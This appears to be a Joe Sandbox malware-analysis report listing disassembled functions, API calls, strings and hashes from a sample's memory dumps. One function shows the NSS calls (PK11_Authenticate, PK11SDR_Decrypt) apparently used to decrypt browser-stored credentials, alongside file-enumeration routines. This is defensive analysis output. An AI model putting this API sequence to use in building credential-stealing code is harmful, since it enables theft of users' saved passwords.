Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 5039916c18083436f840f650f72f7f13abfafcea151ed1bbd43e5e8ba7dac0dd
Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
Opcode Fuzzy Hash: 5039916c18083436f840f650f72f7f13abfafcea151ed1bbd43e5e8ba7dac0dd
Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95

Function 6CFDA5E0 Relevance: 23.1, APIs: 15, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f8288f4572d64e90ec72a8165f223ac60e9097339fc2a708ba561fb76597a6
Instruction ID: a3de63f9da28450caa9f873c5a420eebe605c3d9dcca3721c839b327d276118f
Opcode Fuzzy Hash: c3f8288f4572d64e90ec72a8165f223ac60e9097339fc2a708ba561fb76597a6
Instruction Fuzzy Hash: 06128031D082584FCB25CF2888913EE77F1AF4A318F2E42DAC59997A41D231ADC1CF99

Function 6CFB0570 Relevance: 22.8, APIs: 15, Instructions: 256memoryCOMMON

Download Yara Rule

APIs

PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6CFB05E3
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFB060C
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6CFB061A
PK11_PubDeriveWithKDF.NSS3 ref: 6CFB0712
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CFB0740
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CFB0760
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CFB07AE
PK11_FreeSymKey.NSS3(?), ref: 6CFB07BC
PK11_FreeSymKey.NSS3(?), ref: 6CFB07D1
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CFB07DD
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CFB07EB
SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6CFB07F8
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CFB082F
memcpy.VCRUNTIME140(?,?,?), ref: 6CFB08A9
SECITEM_DupItem_Util.NSS3(?), ref: 6CFB08D0

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
String ID:
API String ID: 657680294-0
Opcode ID: acadbadf7ce94b429745d753494a769fc585fdce573fde10c88fc8c31848009c
Instruction ID: ea0ea1e2096f465632a5479692865166a425020f199be32ee7ccaec84473ef15
Opcode Fuzzy Hash: acadbadf7ce94b429745d753494a769fc585fdce573fde10c88fc8c31848009c
Instruction Fuzzy Hash: 6F91C3B5A083419BE704CF26CE40B5BB7F1AF84318F14852CE9899B791EBB1D944CB82

Function 6CF0ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF0ED0A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF0EE68
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CF0EF87
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CF0EF98

Strings

database corruption, xrefs: 6CF0F48D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF0F483
%s at line %d of [%.10s], xrefs: 6CF0F492

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 89dd06143ba0d2fbafe6e58c26a2ef04635bb3fcfb973f1c654fb4b762ec8cd1
Instruction ID: ec6b66411f5527cde0e74954234787dd47b4757eb1304c9d72651efec2cf26a5
Opcode Fuzzy Hash: 89dd06143ba0d2fbafe6e58c26a2ef04635bb3fcfb973f1c654fb4b762ec8cd1
Instruction Fuzzy Hash: D5622435F04245CFEB44CF24C4A07AABBB1BF49728F28419DD8855BB92D731E882DB94

Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040EE3E
FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
FindClose.KERNEL32(000000FF), ref: 0040F3C3

Strings

%s\*.*, xrefs: 0040EE32

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 6478dddef2edda72903094e747965bb8e42b2a3a60330ba4ddb83b0c39aec67c
Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
Opcode Fuzzy Hash: 6478dddef2edda72903094e747965bb8e42b2a3a60330ba4ddb83b0c39aec67c
Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59

Function 6CF1AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6D03CF46,?,6CF0CDBD,?,6D03BF31,?,?,?,?,?,?,?), ref: 6CF1B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6D03CF46,?,6CF0CDBD,?,6D03BF31), ref: 6CF1B090
sqlite3_free.NSS3(?,?,?,?,?,?,6D03CF46,?,6CF0CDBD,?,6D03BF31), ref: 6CF1B0A2
CloseHandle.KERNEL32(?,?,6D03CF46,?,6CF0CDBD,?,6D03BF31,?,?,?,?,?,?,?,?,?), ref: 6CF1B100
sqlite3_free.NSS3(?,?,00000002,?,6D03CF46,?,6CF0CDBD,?,6D03BF31,?,?,?,?,?,?,?), ref: 6CF1B115
sqlite3_free.NSS3(?,?,?,?,?,?,6D03CF46,?,6CF0CDBD,?,6D03BF31), ref: 6CF1B12D

Part of subcall function 6CF09EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CF1C6FD,?,?,?,?,6CF6F965,00000000), ref: 6CF09F0E
Part of subcall function 6CF09EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CF6F965,00000000), ref: 6CF09F5D

Strings

`m, xrefs: 6CF1B0DF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `m
API String ID: 3155957115-2045012948
Opcode ID: 6bf54f99df201257fd09ac4488706ba5bd8d0436f2020a3bb2a77d436fed1e4b
Instruction ID: af5d3d1876de6588b87752fd9683d9b56776bb7e0ea3e8dfd7e52368f651ecc6
Opcode Fuzzy Hash: 6bf54f99df201257fd09ac4488706ba5bd8d0436f2020a3bb2a77d436fed1e4b
Instruction Fuzzy Hash: A2919DB1A08206CFEB04CF25C884BABB7F2BF45318F154A2DE45697B50EB71E994CB51

Function 0040C920 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C953
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02D3E008), ref: 0040C971
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
PK11_GetInternalKeySlot.NSS3 ref: 0040C98A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C9A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C9EB
memcpy.MSVCRT(?,?,?), ref: 0040CA12
lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
PK11_FreeSlot.NSS3(?), ref: 0040CA61
lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95

Function 6D058550 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 528stringCOMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000021B,recovered %d pages from %s,00000000,?), ref: 6D0585CC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0586CA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D05875F
memset.VCRUNTIME140(?,00000000,?), ref: 6D05893A
sqlite3_free.NSS3(?), ref: 6D058977
sqlite3_free.NSS3 ref: 6D0589A5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D058B68
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D058B79

Strings

recovered %d pages from %s, xrefs: 6D0585C2

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@sqlite3_free$memsetsqlite3_logstrcmpstrlen
String ID: recovered %d pages from %s
API String ID: 1138475946-1623757624
Opcode ID: 376685977b10aae8f09e0980ffad94e63dc0981ba9567962fe5f4e71cd05f053
Instruction ID: 9197d0fb41659a1e63a8d8dd846fd5cc94d0992fd0e2f05d7ba8078ee8bbaab5
Opcode Fuzzy Hash: 376685977b10aae8f09e0980ffad94e63dc0981ba9567962fe5f4e71cd05f053
Instruction Fuzzy Hash: AD1217746183029FE705CF28C990B6ABBE5FF89704F04892DED9A87351EB71E854CB52

Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
FindClose.KERNEL32(000000FF), ref: 0040E4F2

Strings

4@, xrefs: 0040DF32, 0040E500, 0040DFF3, 0040DF75, 0040DFF6
\*.*, xrefs: 0040DF26

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4@$\*.*
API String ID: 2325840235-1993203227
Opcode ID: 059a1f7ffece20b0f78816c664aeabe848e30341bff0d0e3042a9ea7f35bacae
Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
Opcode Fuzzy Hash: 059a1f7ffece20b0f78816c664aeabe848e30341bff0d0e3042a9ea7f35bacae
Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A

Function 6CFD6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CF81C6F,00000000,00000004,?,?), ref: 6CFD6C3F

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CF81C6F,00000000,00000004,?,?), ref: 6CFD6C60
PR_ExplodeTime.NSS3(00000000,6CF81C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CF81C6F,00000000,00000004,?,?), ref: 6CFD6C94

Strings

gfff, xrefs: 6CFD6CFD
gfff, xrefs: 6CFD6CF5
gfff, xrefs: 6CFD6D66
gfff, xrefs: 6CFD6D9C
gfff, xrefs: 6CFD6D30

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 7555f70ebdf98c0b197780ad7ac58ef4c9f457b24c1c2fb01b3bc1adbe095267
Instruction ID: ce2c528c69c1053ed35e9dd9e1a8f42e5248e661a3c7e6f2fe43844334a9edb6
Opcode Fuzzy Hash: 7555f70ebdf98c0b197780ad7ac58ef4c9f457b24c1c2fb01b3bc1adbe095267
Instruction Fuzzy Hash: F1513A72B016494BC708CEADDC527DEBBDAABA4310F48C23AE441DB781D638E906C751

Function 6D050F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6D051027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0510B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D051353

Strings

NULL, xrefs: 6D05119E
-- , xrefs: 6D050FF5
%lld, xrefs: 6D05114B
%02x, xrefs: 6D0512F6
zeroblob(%d), xrefs: 6D051223
$, xrefs: 6D0512A0
'%.*q', xrefs: 6D051217, 6D051292

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: d9a1cabfe5ba5109b6cc2ac86bf1b9b9b6c550c1a730e552f26473b31ee7f987
Instruction ID: 2bf8110ac6dc33c2ebe3478a530d58f408fc9bf8ad38a7fb3542b36ef4214652
Opcode Fuzzy Hash: d9a1cabfe5ba5109b6cc2ac86bf1b9b9b6c550c1a730e552f26473b31ee7f987
Instruction Fuzzy Hash: 28E1A971A083419BE711CF28C580B6FBBF5BF8A354F04886DE9858B251E771E859CB83

Function 6D098D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6D0E14E4,6D04CC70), ref: 6D098D47
PR_GetCurrentThread.NSS3 ref: 6D098D98

Part of subcall function 6CF70F00: PR_GetPageSize.NSS3(6CF70936,FFFFE8AE,?,6CF016B7,00000000,?,6CF70936,00000000,?,6CF0204A), ref: 6CF70F1B
Part of subcall function 6CF70F00: PR_NewLogModule.NSS3(clock,6CF70936,FFFFE8AE,?,6CF016B7,00000000,?,6CF70936,00000000,?,6CF0204A), ref: 6CF70F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6D098E7B
htons.WSOCK32(?), ref: 6D098EDB
PR_GetCurrentThread.NSS3 ref: 6D098F99
PR_GetCurrentThread.NSS3 ref: 6D09910A

Strings

%u.%u.%u.%u, xrefs: 6D098E74

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 88e4f7a8e4ab2ab327f0fb01f158303a265bc3784e4980a4d88d754ad88b1994
Instruction ID: 7b7970e4ec3cb231d4835c3577d2150aa6ed436e87f87ae2e86874f2494c7a12
Opcode Fuzzy Hash: 88e4f7a8e4ab2ab327f0fb01f158303a265bc3784e4980a4d88d754ad88b1994
Instruction Fuzzy Hash: DA0276319042568FEB198B19C4687BABBE2FF86300F09E269D8915F395C335D989D790

Function 6D03A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6D05C3A2,?,?,00000000,00000000), ref: 6D03A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D03A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D03A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D03A738

Strings

database corruption, xrefs: 6D03A6D4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D03A6CA
%s at line %d of [%.10s], xrefs: 6D03A6D9

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

